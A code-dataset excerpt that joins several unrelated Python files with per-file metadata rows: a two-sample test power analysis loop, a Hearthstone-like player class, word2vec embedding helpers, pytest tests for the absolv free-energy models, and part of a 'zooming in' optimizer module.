split (str): fold to evaluate, e.g. 'validation' or 'test
sample_sizes (list, optional): Defaults to [10, 30, 50, 100, 500].
num_reps (int, optional): for calculation rejection rates. Defaults to 100.
num_permutations (int, optional): for MMD-D permutation test. Defaults to 1000.
"""
log_dir = os.path.join(exp_dir, exp_name)
out_csv = os.path.join(log_dir, f'{split}_consistency_analysis.csv')
df = pd.DataFrame(columns=['sample_size','power', 'power_stderr',
'type_1err', 'type_1err_stderr', 'method'])
for batch_size in sample_sizes:
params['dataset']['dl']['batch_size'] = batch_size
dataloader = dataset_fn(seed=seed, params_dict=params['dataset'])
# MMD-D
model = model_fn(seed=seed, params=params['model'])
trainer = trainer_object_fn(model=model, dataloaders=dataloader, seed=seed,
log_dir=log_dir, **params['trainer'])
res = trainer.performance_measures(dataloader[split]['p'], dataloader[split]['q'], num_batches=num_reps,
num_permutations=num_permutations)
res_mmd = {'exp_hash': exp_name,
'sample_size': batch_size,
'power': res['reject_rate'],
'power_stderr': stderr_proportion(res['reject_rate'], batch_size),
'type_1err': res['type_1_err'] ,
'type_1err_stderr': stderr_proportion(res['type_1_err'] , batch_size),
'method': 'mmd'}
# MUKS
model = get_classification_model(params['model'])
reject_rate, type_1_err = muks(dataloader[split]['p'], dataloader[split]['q'], num_reps, model)
res_rabanser = {'exp_hash': exp_name,
'sample_size': batch_size,
'power': reject_rate,
'power_stderr': stderr_proportion(reject_rate, batch_size),
'type_1err': type_1_err,
'type_1err_stderr': stderr_proportion(type_1_err, batch_size),
'method': 'rabanser'}
print('---------------------------------')
print(f'sample size: {batch_size}')
print(f'mmd: {res_mmd}')
print(f'rabanser: {res_rabanser}')
df = df.append(pd.DataFrame(res_mmd, index=['']), ignore_index=True)
df = df.append(pd.DataFrame(res_rabanser, index=['']), ignore_index=True)
df.to_csv(out_csv)
| 41.4375
| 112
| 0.574962
| 397
| 3,315
| 4.554156
| 0.284635
| 0.049779
| 0.022124
| 0.031527
| 0.289823
| 0.266593
| 0.143805
| 0.084071
| 0.042035
| 0
| 0
| 0.021478
| 0.297738
| 3,315
| 79
| 113
| 41.962025
| 0.755155
| 0.161086
| 0
| 0.043478
| 0
| 0
| 0.154043
| 0.023783
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.152174
| 0.021739
| 0.217391
| 0.086957
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a59c22cef1a85002b71aba681bd1b6e2ffee762e
| 7,344
|
py
|
Python
|
absolv/tests/test_models.py
|
SimonBoothroyd/absolv
|
dedb2b6eb567ec1b627dbe50f36f68e0c32931c4
|
[
"MIT"
] | null | null | null |
absolv/tests/test_models.py
|
SimonBoothroyd/absolv
|
dedb2b6eb567ec1b627dbe50f36f68e0c32931c4
|
[
"MIT"
] | 30
|
2021-11-02T12:47:24.000Z
|
2022-03-01T22:00:39.000Z
|
absolv/tests/test_models.py
|
SimonBoothroyd/absolv
|
dedb2b6eb567ec1b627dbe50f36f68e0c32931c4
|
[
"MIT"
] | null | null | null |
import numpy
import pytest
from openmm import unit
from pydantic import ValidationError
from absolv.models import (
DeltaG,
EquilibriumProtocol,
MinimizationProtocol,
SimulationProtocol,
State,
SwitchingProtocol,
System,
TransferFreeEnergyResult,
)
from absolv.tests import is_close
class TestSystem:
def test_n_solute_molecules(self):
system = System(solutes={"CO": 2, "CCO": 3}, solvent_a={"O": 1}, solvent_b=None)
assert system.n_solute_molecules == 5
@pytest.mark.parametrize("solvent_a, n_expected", [({"O": 3}, 3), (None, 0)])
def test_n_solvent_molecules_a(self, solvent_a, n_expected):
system = System(
solutes={
"CO": 1,
},
solvent_a=solvent_a,
solvent_b={"O": 5},
)
assert system.n_solvent_molecules_a == n_expected
@pytest.mark.parametrize("solvent_b, n_expected", [({"O": 5}, 5), (None, 0)])
def test_n_solvent_molecules_b(self, solvent_b, n_expected):
system = System(
solutes={
"CO": 1,
},
solvent_a={"O": 3},
solvent_b=solvent_b,
)
assert system.n_solvent_molecules_b == n_expected
def test_validate_solutes(self):
with pytest.raises(
ValidationError, match="at least one solute must be specified"
):
System(solutes={}, solvent_a=None, solvent_b=None)
system = System(solutes={"C": 1}, solvent_a=None, solvent_b=None)
assert system.solutes == {"C": 1}
def test_validate_solvent_a(self):
with pytest.raises(
ValidationError, match="specified when `solvent_a` is not none"
):
System(solutes={"C": 1}, solvent_a={}, solvent_b=None)
system = System(solutes={"C": 1}, solvent_a={"O": 2}, solvent_b=None)
assert system.solvent_a == {"O": 2}
def test_validate_solvent_b(self):
with pytest.raises(
ValidationError, match="specified when `solvent_b` is not none"
):
System(solutes={"C": 1}, solvent_a=None, solvent_b={})
system = System(solutes={"C": 1}, solvent_a=None, solvent_b={"O": 2})
assert system.solvent_b == {"O": 2}
def test_to_components(self):
system = System(
solutes={"CO": 1, "CCO": 2}, solvent_a={"O": 3}, solvent_b={"OCO": 4}
)
components_a, components_b = system.to_components()
assert components_a == [("CO", 1), ("CCO", 2), ("O", 3)]
assert components_b == [("CO", 1), ("CCO", 2), ("OCO", 4)]
class TestState:
def test_unit_validation(self):
state = State(
temperature=298.0 * unit.kelvin, pressure=101.325 * unit.kilopascals
)
assert is_close(state.temperature, 298.0)
assert is_close(state.pressure, 1.0)
class TestMinimizationProtocol:
def test_unit_validation(self):
protocol = MinimizationProtocol(
tolerance=1.0 * unit.kilojoule_per_mole / unit.angstrom
)
assert is_close(protocol.tolerance, 10.0)
class TestSimulationProtocol:
def test_unit_validation(self):
protocol = SimulationProtocol(
n_steps_per_iteration=1,
n_iterations=1,
timestep=0.002 * unit.picoseconds,
thermostat_friction=0.003 / unit.femtoseconds,
)
assert is_close(protocol.timestep, 2.0)
assert is_close(protocol.thermostat_friction, 3.0)
class TestEquilibriumProtocol:
def test_n_states(self):
protocol = EquilibriumProtocol(
lambda_sterics=[1.0, 0.5, 0.0], lambda_electrostatics=[1.0, 1.0, 1.0]
)
assert protocol.n_states == 3
@pytest.mark.parametrize(
"lambda_sterics, lambda_electrostatics",
[([1.0, 0.5, 0.0], [1.0, 1.0]), ([1.0, 0.5], [1.0, 1.0, 1.0])],
)
def test_validate_lambda_lengths(self, lambda_sterics, lambda_electrostatics):
with pytest.raises(ValidationError, match="lambda lists must be the same"):
EquilibriumProtocol(
lambda_sterics=lambda_sterics,
lambda_electrostatics=lambda_electrostatics,
)
class TestSwitchingProtocol:
def test_unit_validation(self):
protocol = SwitchingProtocol(
n_electrostatic_steps=6250,
n_steps_per_electrostatic_step=1,
n_steric_steps=18750,
n_steps_per_steric_step=1,
timestep=0.002 * unit.picoseconds,
thermostat_friction=0.003 / unit.femtoseconds,
)
assert is_close(protocol.timestep, 2.0)
assert is_close(protocol.thermostat_friction, 3.0)
class TestDeltaG:
def test_add(self):
value_a = DeltaG(value=1.0, std_error=2.0)
value_b = DeltaG(value=3.0, std_error=4.0)
result = value_a + value_b
assert is_close(result.value, 4.0)
assert is_close(result.std_error, numpy.sqrt(20))
def test_sub(self):
value_a = DeltaG(value=1.0, std_error=2.0)
value_b = DeltaG(value=3.0, std_error=4.0)
result = value_b - value_a
assert is_close(result.value, 2.0)
assert is_close(result.std_error, numpy.sqrt(20))
class TestTransferFreeEnergyResult:
@pytest.fixture()
def free_energy_result(self, argon_eq_schema):
return TransferFreeEnergyResult(
input_schema=argon_eq_schema,
delta_g_solvent_a=DeltaG(value=1.0, std_error=2.0),
delta_g_solvent_b=DeltaG(value=3.0, std_error=4.0),
)
def test_delta_g_from_a_to_b(self, free_energy_result):
delta_g = free_energy_result.delta_g_from_a_to_b
assert is_close(delta_g.value, -2.0)
assert is_close(delta_g.std_error, numpy.sqrt(20))
def test_delta_g_from_b_to_a(self, free_energy_result):
delta_g = free_energy_result.delta_g_from_b_to_a
assert is_close(delta_g.value, 2.0)
assert is_close(delta_g.std_error, numpy.sqrt(20))
def test_boltzmann_temperature(self, free_energy_result):
value = free_energy_result._boltzmann_temperature
assert is_close(value, 85.5 * unit.kelvin * unit.MOLAR_GAS_CONSTANT_R)
def test_delta_g_from_a_to_b_with_units(self, free_energy_result):
value, std_error = free_energy_result.delta_g_from_a_to_b_with_units
assert is_close(value, -2.0 * 85.5 * unit.kelvin * unit.MOLAR_GAS_CONSTANT_R)
assert is_close(
std_error, numpy.sqrt(20) * 85.5 * unit.kelvin * unit.MOLAR_GAS_CONSTANT_R
)
def test_delta_g_from_b_to_a_with_units(self, free_energy_result):
value, std_error = free_energy_result.delta_g_from_b_to_a_with_units
assert is_close(value, 2.0 * 85.5 * unit.kelvin * unit.MOLAR_GAS_CONSTANT_R)
assert is_close(
std_error, numpy.sqrt(20) * 85.5 * unit.kelvin * unit.MOLAR_GAS_CONSTANT_R
)
def test_str(self, free_energy_result):
assert (
str(free_energy_result)
== "ฮG a->b=-0.340 kcal/mol ฮG a->b std=0.760 kcal/mol"
)
def test_repr(self, free_energy_result):
assert repr(free_energy_result) == (
"TransferFreeEnergyResult(ฮG a->b=-0.340 kcal/mol ฮG a->b std=0.760 kcal/mol)"
)
| 30.473029
| 90
| 0.631672
| 984
| 7,344
| 4.428862
| 0.142276
| 0.035337
| 0.05966
| 0.022487
| 0.560119
| 0.479807
| 0.429555
| 0.41464
| 0.404773
| 0.327214
| 0
| 0.037356
| 0.2564
| 7,344
| 240
| 91
| 30.6
| 0.760667
| 0
| 0
| 0.216374
| 0
| 0.011696
| 0.053649
| 0.006536
| 0
| 0
| 0
| 0
| 0.181287
| 1
| 0.134503
| false
| 0
| 0.035088
| 0.005848
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a08838db67fdc32c63308d4dd034cb11ff2a45
| 3,745
|
py
|
Python
|
src/FSG/WordEmbedding.py
|
handsomebrothers/Callback2Vec
|
370adbcfcc229d385ba9c8c581489b703a39ca85
|
[
"MIT"
] | null | null | null |
src/FSG/WordEmbedding.py
|
handsomebrothers/Callback2Vec
|
370adbcfcc229d385ba9c8c581489b703a39ca85
|
[
"MIT"
] | null | null | null |
src/FSG/WordEmbedding.py
|
handsomebrothers/Callback2Vec
|
370adbcfcc229d385ba9c8c581489b703a39ca85
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import multiprocessing
from gensim.models import Word2Vec
import csv
def embedding_sentences(sentences, embedding_size = 64, window = 3, min_count = 0, file_to_load = None, file_to_save = None):
'''
embeding_size Word Embedding Dimension
window : Context window
min_count : Word frequency less than min_count will be deleted
'''
if file_to_load is not None:
w2vModel = Word2Vec.load(file_to_load) # load model
else:
w2vModel = Word2Vec(sentences, size = embedding_size, window = window, min_count = min_count, workers = multiprocessing.cpu_count(),seed=200)
if file_to_save is not None:
w2vModel.save(file_to_save) # Save Model
return w2vModel
# This function is used to represent a sentence as a vector (corresponding to representing a method as a vector)
def get_method_vector(sentence,w2vModel):
sentence_vector=[]
for word in sentence:
sentence_vector.append(w2vModel[word])#Word vectors for adding each word
return sentence_vector
# This function is used to represent a word as a vector (corresponding to a word in method)
def get_word_vector(word,w2vModel):
return w2vModel[word]
# This function is used to get the vector of a text (corresponding to the word vector of class or apk)
def get_apk_class_vector(document,w2vModel):
all_vectors = []
embeddingDim = w2vModel.vector_size
# ๅตๅ
ฅ็ปดๆฐ
embeddingUnknown = [0 for i in range(embeddingDim)]
for sentence in document:
this_vector = []
for word in sentence:
if word in w2vModel.wv.vocab:
this_vector.append(w2vModel[word])
else:
this_vector.append(embeddingUnknown)
all_vectors.append(this_vector)
return all_vectors
# This function is used to obtain the similarity between two sentences,
# with the help of python's own function to calculate the similarity.
def get_two_sentence_simility(sentence1,sentence2,w2vModel):
sim = w2vModel.n_similarity(sentence1, sentence2)
return sim
# Used to build corpus
def bulid_word2vec_model():#Used to build word 2vec model
model = embedding_sentences(get_corpus_(), embedding_size=32,
min_count=0,
file_to_save='D:\\APK_็ง็ \\word2vec\\apk_trained_word2vec.model')
return model
# Used to get the model that has been created
def get_already_word2vec_model(file_to_load):
model = Word2Vec.load(file_to_load)
return model
# Used for acquiring corpus
def get_corpus():
all_data=[]
data_readers=csv.reader(open('D:/new_amd_callback_data1.csv'))
for reader in data_readers:
if len(reader)>1:
# print(reader)
all_data.append(reader)
amd_data_readers=csv.reader(open('D:/new_callback_data1.csv'))
for amd_reader in amd_data_readers:
if len(amd_reader)>1:
# print(amd_reader)
all_data.append(amd_reader)
print('over')
return all_data
def get_corpus_():
all_data = []
data_readers = csv.reader(open('D:/new_amd_callback_data.csv'))
for reader in data_readers:
if len(reader) > 1:
# print(reader)
all_data.append(reader)
amd_data_readers = csv.reader(open('D:/new_amd_callback_data1.csv'))
for amd_reader in amd_data_readers:
if len(amd_reader) > 1:
# print(amd_reader)
all_data.append(amd_reader)
amd_data_readers_=csv.reader(open('D:/new_callback_data.csv'))
for amd_reader_ in amd_data_readers_:
if len(amd_reader_)>1:
all_data.append(amd_reader_)
print('over')
return all_data
if __name__ == "__main__":
bulid_word2vec_model()
| 40.706522
| 149
| 0.687316
| 522
| 3,745
| 4.681992
| 0.233716
| 0.040507
| 0.03437
| 0.040917
| 0.380115
| 0.295008
| 0.295008
| 0.270458
| 0.270458
| 0.270458
| 0
| 0.016661
| 0.230708
| 3,745
| 91
| 150
| 41.153846
| 0.831656
| 0.223765
| 0
| 0.333333
| 0
| 0
| 0.069435
| 0.063852
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.041667
| 0.013889
| 0.291667
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a1b481c21e6820b7064b6612f4c7a3b1370fc4
| 10,914
|
py
|
Python
|
hearthstone/player.py
|
dianarvp/stone_ground_hearth_battles
|
450e70eaef21b543be579a6d696676fb148a99b0
|
[
"Apache-2.0"
] | null | null | null |
hearthstone/player.py
|
dianarvp/stone_ground_hearth_battles
|
450e70eaef21b543be579a6d696676fb148a99b0
|
[
"Apache-2.0"
] | null | null | null |
hearthstone/player.py
|
dianarvp/stone_ground_hearth_battles
|
450e70eaef21b543be579a6d696676fb148a99b0
|
[
"Apache-2.0"
] | null | null | null |
import itertools
import typing
from collections import defaultdict
from typing import Optional, List, Callable, Type
from hearthstone.cards import MonsterCard, CardEvent, Card
from hearthstone.events import BuyPhaseContext, EVENTS
from hearthstone.hero import EmptyHero
from hearthstone.monster_types import MONSTER_TYPES
from hearthstone.triple_reward_card import TripleRewardCard
if typing.TYPE_CHECKING:
from hearthstone.tavern import Tavern
from hearthstone.hero import Hero
from hearthstone.randomizer import Randomizer
class BuyPhaseEvent:
pass
StoreIndex = typing.NewType("StoreIndex", int)
HandIndex = typing.NewType("HandIndex", int)
BoardIndex = typing.NewType("BoardIndex", int)
class Player:
def __init__(self, tavern: 'Tavern', name: str, hero_options: List['Hero']):
self.name = name
self.tavern = tavern
self.hero = None
self.hero_options = hero_options
self.health = None
self.tavern_tier = 1
self.coins = 0
self.triple_rewards = []
self.discovered_cards: List[MonsterCard] = []
self.maximum_board_size = 7
self.maximum_hand_size = 10
self.refresh_store_cost = 1
self._tavern_upgrade_costs = (0, 5, 7, 8, 9, 10)
self.tavern_upgrade_cost = 5
self.hand: List[MonsterCard] = []
self.in_play: List[MonsterCard] = []
self.store: List[MonsterCard] = []
self.frozen = False
self.counted_cards = defaultdict(lambda: 0)
@staticmethod
def new_player_with_hero(tavern: 'Tavern', name: str, hero: Optional['Hero'] = None) -> 'Player':
if hero is None:
hero = EmptyHero()
player = Player(tavern, name, [hero])
player.choose_hero(hero)
return player
@property
def coin_income_rate(self):
return min(self.tavern.turn_count + 3, 10)
def player_main_step(self):
self.draw()
# player can:
# rearrange monsters
# summon monsters
# buy from the store
# freeze the store
# refresh the store
# sell monsters
# set fight ready
def apply_turn_start_income(self):
self.coins = self.coin_income_rate
def decrease_tavern_upgrade_cost(self):
self.tavern_upgrade_cost = max(0, self.tavern_upgrade_cost - 1)
def upgrade_tavern(self):
assert self.validate_upgrade_tavern()
self.coins -= self.tavern_upgrade_cost
self.tavern_tier += 1
if self.tavern_tier < self.max_tier():
self.tavern_upgrade_cost = self._tavern_upgrade_costs[self.tavern_tier]
def validate_upgrade_tavern(self) -> bool:
if self.tavern_tier >= self.max_tier():
return False
if self.coins < self.tavern_upgrade_cost:
return False
return True
def summon_from_hand(self, index: HandIndex, targets: Optional[List[BoardIndex]] = None):
# TODO: add (optional?) destination index parameter for Defender of Argus
# TODO: make sure that the ordering of monster in hand and monster.battlecry are correct
# TODO: Jarett can monster be event target
if targets is None:
targets = []
assert self.validate_summon_from_hand(index, targets)
card = self.hand.pop(index)
self.in_play.append(card)
if card.golden:
self.triple_rewards.append(TripleRewardCard(min(self.tavern_tier + 1, 6)))
if card.magnetic:
self.check_magnetic(card)
target_cards = [self.in_play[target] for target in targets]
self.broadcast_buy_phase_event(CardEvent(card, EVENTS.SUMMON_BUY, target_cards))
def validate_summon_from_hand(self, index: HandIndex, targets: Optional[List[BoardIndex]] = None) -> bool:
if targets is None:
targets = []
# TODO: Jack num_battlecry_targets should only accept 0,1,2
if index not in range(len(self.hand)):
return False
card = self.hand[index]
if not self.room_on_board():
return False
valid_targets = [target_index for target_index, target_card in enumerate(self.in_play) if
card.validate_battlecry_target(target_card)]
num_possible_targets = min(len(valid_targets), card.num_battlecry_targets)
if len(targets) != num_possible_targets:
return False
if len(set(targets)) != len(targets):
return False
for target in targets:
if target not in valid_targets:
return False
return True
def play_triple_rewards(self):
if not self.triple_rewards:
return
discover_tier = self.triple_rewards.pop(-1).level
self.draw_discover(lambda card: card.tier == discover_tier)
def validate_triple_rewards(self) -> bool:
return bool(self.triple_rewards)
def draw_discover(self, predicate: Callable[[Card], bool]):
discoverables = [card for card in self.tavern.deck.all_cards() if predicate(card)]
for _ in range(3):
self.discovered_cards.append(self.tavern.randomizer.select_discover_card(discoverables))
discoverables.remove(self.discovered_cards[-1])
self.tavern.deck.remove_card(self.discovered_cards[-1])
def select_discover(self, card: Card):
assert (card in self.discovered_cards)
assert (isinstance(card, MonsterCard)) # TODO: discover other card types
self.discovered_cards.remove(card)
self.hand.append(card)
self.tavern.deck.return_cards(itertools.chain.from_iterable([card.dissolve() for card in self.discovered_cards]))
self.discovered_cards = []
self.check_golden(type(card))
def summon_from_void(self, monster: MonsterCard):
if self.room_on_board():
self.in_play.append(monster)
self.check_golden(type(monster))
self.broadcast_buy_phase_event(CardEvent(monster, EVENTS.SUMMON_BUY))
def room_on_board(self):
return len(self.in_play) < self.maximum_board_size
def draw(self):
if self.frozen:
self.frozen = False
else:
self.return_cards()
number_of_cards = 3 + self.tavern_tier // 2 - len(self.store)
self.store.extend([self.tavern.deck.draw(self) for _ in range(number_of_cards)])
def purchase(self, index: StoreIndex):
# check if the index is valid
assert self.validate_purchase(index)
card = self.store.pop(index)
self.coins -= card.coin_cost
self.hand.append(card)
event = CardEvent(card, EVENTS.BUY)
self.broadcast_buy_phase_event(event)
self.check_golden(type(card))
def validate_purchase(self, index: StoreIndex) -> bool:
if index not in range(len(self.store)):
return False
if self.coins < self.store[index].coin_cost:
return False
if not self.room_in_hand():
return False
return True
def check_golden(self, check_card: Type[MonsterCard]):
cards = [card for card in self.in_play + self.hand if isinstance(card, check_card) and not card.golden]
assert len(cards) <= 3, f"fnord{cards}"
if len(cards) == 3:
for card in cards:
if card in self.in_play:
self.in_play.remove(card)
if card in self.hand:
self.hand.remove(card)
golden_card = check_card()
golden_card.golden_transformation(cards)
self.hand.append(golden_card)
def check_magnetic(self, card):
# TODO: decide if magnetic should be implemented using targets
index = self.in_play.index(card)
assert card.magnetic
if index + 1 in range(len(self.in_play)) and self.in_play[index + 1].monster_type in (MONSTER_TYPES.MECH, MONSTER_TYPES.ALL):
mech = self.in_play[index + 1]
self.in_play.remove(card)
mech.magnetic_transformation(card)
def reroll_store(self):
assert self.validate_reroll()
self.coins -= self.refresh_store_cost
self.return_cards()
self.draw()
def validate_reroll(self) -> bool:
return self.coins >= self.refresh_store_cost
def return_cards(self):
self.tavern.deck.return_cards(itertools.chain.from_iterable([card.dissolve() for card in self.store]))
self.store = []
def freeze(self):
self.frozen = True
def _sell_minion(self, location: List[MonsterCard], index: int):
assert self._validate_sell_minion(location, index)
self.broadcast_buy_phase_event(CardEvent(location[index], EVENTS.SELL))
card = location.pop(index)
self.coins += card.redeem_rate
self.tavern.deck.return_cards(card.dissolve())
def sell_hand_minion(self, index: HandIndex):
return self._sell_minion(self.hand, index)
def sell_board_minion(self, index: BoardIndex):
return self._sell_minion(self.in_play, index)
@staticmethod
def _validate_sell_minion(location: List[MonsterCard], index: int) -> bool:
return index in range(len(location))
def validate_sell_hand_minion(self, index: HandIndex) -> bool:
return self._validate_sell_minion(self.hand, index)
def validate_sell_board_minion(self, index: BoardIndex) -> bool:
return self._validate_sell_minion(self.in_play, index)
def hero_power(self):
self.hero.hero_power(BuyPhaseContext(self, self.tavern.randomizer))
def validate_hero_power(self) -> bool:
return self.hero.hero_power_valid(BuyPhaseContext(self, self.tavern.randomizer))
def broadcast_buy_phase_event(self, event: CardEvent, randomizer: Optional['Randomizer'] = None):
self.hero.handle_event(event, BuyPhaseContext(self, randomizer or self.tavern.randomizer))
for card in self.in_play.copy():
card.handle_event(event, BuyPhaseContext(self, randomizer or self.tavern.randomizer))
for card in self.hand.copy():
card.handle_event_in_hand(event, BuyPhaseContext(self, randomizer or self.tavern.randomizer))
def hand_size(self):
return len(self.hand) + len(self.triple_rewards)
def room_in_hand(self):
return self.hand_size() < self.maximum_hand_size
def max_tier(self):
return len(self._tavern_upgrade_costs)
def choose_hero(self, hero: 'Hero'):
assert(self.validate_choose_hero(hero))
self.hero = hero
self.hero_options = []
self.health = self.hero.starting_health()
self._tavern_upgrade_costs = self.hero.tavern_upgrade_costs()
self.tavern_upgrade_cost = self.hero.tavern_upgrade_costs()[1]
def validate_choose_hero(self, hero: 'Hero'):
return self.hero is None and hero in self.hero_options
| 38.702128
| 133
| 0.660711
| 1,390
| 10,914
| 4.988489
| 0.133094
| 0.047592
| 0.024517
| 0.0212
| 0.287424
| 0.197
| 0.096914
| 0.07182
| 0.063744
| 0.063744
| 0
| 0.004618
| 0.246014
| 10,914
| 281
| 134
| 38.839858
| 0.838012
| 0.047645
| 0
| 0.13964
| 0
| 0
| 0.008191
| 0
| 0
| 0
| 0
| 0.003559
| 0.045045
| 1
| 0.175676
| false
| 0.004505
| 0.054054
| 0.063063
| 0.369369
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a5a2a13b3d7e2462a415df9e5bf700f91ae466fd
| 12,743
|
py
|
Python
|
PyStationB/libraries/ABEX/abex/optimizers/zoom_optimizer.py
|
BrunoKM/station-b-libraries
|
ea3591837e4a33f0bef789d905467754c27913b3
|
[
"MIT"
] | 6
|
2021-09-29T15:46:55.000Z
|
2021-12-14T18:39:51.000Z
|
PyStationB/libraries/ABEX/abex/optimizers/zoom_optimizer.py
|
BrunoKM/station-b-libraries
|
ea3591837e4a33f0bef789d905467754c27913b3
|
[
"MIT"
] | null | null | null |
PyStationB/libraries/ABEX/abex/optimizers/zoom_optimizer.py
|
BrunoKM/station-b-libraries
|
ea3591837e4a33f0bef789d905467754c27913b3
|
[
"MIT"
] | 3
|
2021-09-27T10:35:20.000Z
|
2021-10-02T17:53:07.000Z
|
# -------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# -------------------------------------------------------------------------------------------
"""A submodule implementing "zooming in" (Biological) optimization strategy.
This optimization strategy has a single hyperparameter :math:`s`, called the *shrinking factor*.
It consists of of the following steps:
1. The optimization space is a hypercuboid
.. math::
C = [a_1, b_1] \\times [a_2, b_2] \\times \\cdots \\times [a_n, b_n].
2. Find the optimum :math:`x=(x_1, x_2, \\dots, x_n)` among the already collected samples.
3. Construct a new hypercuboid :math:`D` centered at :math:`x`. If this is the :math:`N`th optimization step, the
volume of :math:`D` is given by
.. math::
\\mathrm{vol}\\, D = s^N \\cdot \\mathrm{vol}\\, C
Step :math:`N` is either provided in the configuration file or is estimated as ``n_samples/batch_size``.
4. If :math:`D` is not a subset of :math:`C`, we translate it by a vector.
5. To suggest a new batch we sample the hypercuboid :math:`D`. Many different sampling methods are available, see
:ref:`abex.sample_designs` for this. For example, we can construct a grid, sample in a random way or use Latin
or Sobol sampling.
"""
from pathlib import Path
from typing import List, Tuple
import abex.optimizers.optimizer_base as base
import numpy as np
import pandas as pd
from abex import space_designs as designs
from abex.dataset import Dataset
from abex.settings import OptimizationStrategy, ZoomOptSettings
from emukit.core import ContinuousParameter, ParameterSpace
Interval = Tuple[float, float] # Endpoints of an interval
Hypercuboid = List[Interval] # Optimization space is represented by a rectangular box
class ZoomOptimizer(base.OptimizerBase):
strategy_name = OptimizationStrategy.ZOOM.value
def run(self) -> Tuple[Path, pd.DataFrame]:
"""
Optimizes function using "zooming in" strategy -- around observed maximum a new "shrunk" space is selected. We
sample this space (e.g. using grid sampling or random sampling) to suggest new observations.
Note:
This method should not work well with very noisy functions or functions having a non-unique maximum. A more
robust alternative (as Bayes optimization) should be preferred. On the other hand, this method is much
faster to compute.
Returns:
path to the CSV with locations of new samples to be collected
data frame with locations of new samples to be collected
Raises:
ValueError, if batch size is less than 1
"""
# Construct the data set
dataset: Dataset = self.construct_dataset()
assert (
self.config.zoomopt is not None
), "You need to set the 'zoomopt' field in the config to use Zoom optimizer."
batch_transformed_space: np.ndarray = _suggest_samples(dataset=dataset, settings=self.config.zoomopt)
# Transform the batch back to original space
batch_original_space: pd.DataFrame = self.suggestions_to_original_space(
dataset=dataset, new_samples=batch_transformed_space
)
# Save the batch to the disk and return it
batch_original_space.to_csv(self.config.experiment_batch_path, index=False)
# Save the inferred optimum
optimum = evaluate_optimum(dataset)
optimum.to_csv(self.config.results_dir / "optima.csv", index=False)
return self.config.experiment_batch_path, batch_original_space
def evaluate_optimum(dataset: Dataset) -> pd.DataFrame:
"""
Return the optimum as inferred by the Zoom Opt. algorithm. The inferred optimum is taken as the location
of the observed sample with highest observed objective.
Args:
dataset (dataset.Dataset): Dataset with the data observed so-far.
Returns:
pd.DataFrame: A DataFrame with a single row: the inputs at the inferred optimum
"""
# Get the index of data point with highest observed objective
optimum_idx = dataset.pretransform_df[dataset.pretransform_output_name].argmax()
# Get the inputs of the data point with highest observed objective
optimum_loc = dataset.pretransform_df[dataset.pretransform_input_names].iloc[[optimum_idx]]
return optimum_loc
def _suggest_samples(dataset: Dataset, settings: ZoomOptSettings) -> np.ndarray:
"""Suggests a new batch of samples.
Currently this method doesn't allow categorical inputs.
Returns:
a batch of suggestions. Shape (batch_size, n_inputs).
Raises:
ValueError, if batch size is less than 1
NotImplementedError, if any categorical inputs are present
"""
if settings.batch < 1:
raise ValueError(f"Use batch size at least 1. (Was {settings.batch}).") # pragma: no cover
continuous_dict, categorical_dict = dataset.parameter_space
# If any categorical variable is present, we raise an exception. In theory they should be represented by one-hot
# encodings, but I'm not sure how to retrieve the bounds of this space and do optimization within it (the
# best way is probably to optimize it in an unconstrained space and map it to one-hot vectors using softmax).
# Moreover, in BayesOpt there is iteration over contexts.
if categorical_dict:
raise NotImplementedError("This method doesn't work with categorical inputs right now.") # pragma: no cover
# It seems that continuous_dict.values() contains pandas series instead of tuples, so we need to map over it
# to retrieve the parameter space
original_space: Hypercuboid = [(a, b) for a, b in continuous_dict.values()]
# Find the location of the optimum. We will shrink the space around it
optimum: np.ndarray = _get_optimum_location(dataset)
# Estimate how many optimization iterations were performed.
step_number: int = settings.n_step or _estimate_step_number(
n_points=len(dataset.output_array), batch_size=settings.batch
)
# Convert to per-batch shrinking factor if a per-iteration shrinking factor supplied
per_batch_shrinking_factor = (
settings.shrinking_factor ** settings.batch if settings.shrink_per_iter else settings.shrinking_factor
)
# Calculate by what factor each dimension of the hypercube should be shrunk
shrinking_factor_per_dim: float = _calculate_shrinking_factor(
initial_shrinking_factor=per_batch_shrinking_factor, step_number=step_number, n_dim=len(original_space)
)
# Shrink the space
new_space: Hypercuboid = [
shrink_interval(
shrinking_factor=shrinking_factor_per_dim, interval=interval, shrinking_anchor=optimum_coordinate
)
for interval, optimum_coordinate in zip(original_space, optimum)
]
# The shrunk space may be out of the original bounds (e.g. if the maximum was close to the boundary).
# Translate it.
new_space = _move_to_original_bounds(new_space=new_space, original_space=original_space)
# Sample the new space to get a batch of new suggestions.
parameter_space = ParameterSpace([ContinuousParameter(f"x{i}", low, upp) for i, (low, upp) in enumerate(new_space)])
return designs.suggest_samples(
parameter_space=parameter_space, design_type=settings.design, point_count=settings.batch
)
def _estimate_step_number(n_points: int, batch_size: int) -> int:
